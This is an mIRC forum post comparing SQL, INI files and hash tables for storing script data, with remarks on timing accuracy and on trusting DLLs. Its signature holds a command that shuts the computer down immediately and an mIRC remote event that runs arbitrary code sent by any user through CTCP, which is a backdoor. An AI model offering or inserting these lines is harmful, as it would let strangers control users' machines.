Maybe you never read the part about how $ticks isn't very accurate... It might show up to, perhaps, millisecond accuracy, but the program I used was showing the real system time, which was nanosecond accuracy, also.. using the program itself to time something isn't as accurate as looking at a program that can time everything to 9 decimals of a second and doesn't interfere with the application being timed.

If you want the app, or a link to it, I'll post it... but I don't want to do so now as I'm unsure about the rules on software linking here on the mIRC forums, as I know linking outside of a forum is sometimes forbidden.

Sure SQL isn't for everything or everyone, but it's still far faster than INI ever was or will be, and we've been doing numerous tests for a few hours, and INI is at least three-fold slower than a database file with the same info (which you, and others, seem to selectivly not read in my previous posts, that all tests are done with files all containing the same info.)

I actually haven't done any testing on variables themselves, I was simply using the fact that variables are stored to an INI file, I've since been corrected that they're only stored there periodically, not actually used from the INI file itself, which was my original assumption. I do, however, need to think of a good way to compare hash tables to SQL tables in mIRC, and I do have a peak script that currently makes use of hash tables.. so perhaps I will use that as a comparison.

And, even though people may wish to believe SQL is for massive sizes of data, does it really matter how much data you put in it? It's still far faster in the longrun, especially compared to INI and text files for storing data, that and people put simple "two column" type data elements in INI/TXT files, which would be faster in both hash and SQL (though you have to reaload all the data and recreate/load the hash-table each time unlike for SQL). Until I learned of SQL, I thought hash tables were a basterdized form of SQL (two columns, but close in speed), again the test in a while here will be of good speed comparison.

Sure dll's are nice and all that, but built in functionality is always better, and being paranoid as I am, I'd trust Khaled over some random person that made the dll, even if I know neither of them personally, Khaled would have the reputation and the fact taht he's releasing a thousand, maybe half-million user program, unlike the dll guy that has no given numbers beforehand, and so releasing a virus/trojan (if there was one) wouldn't be as noticed.

Last edited by Midori; 22/05/07 08:00 AM.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}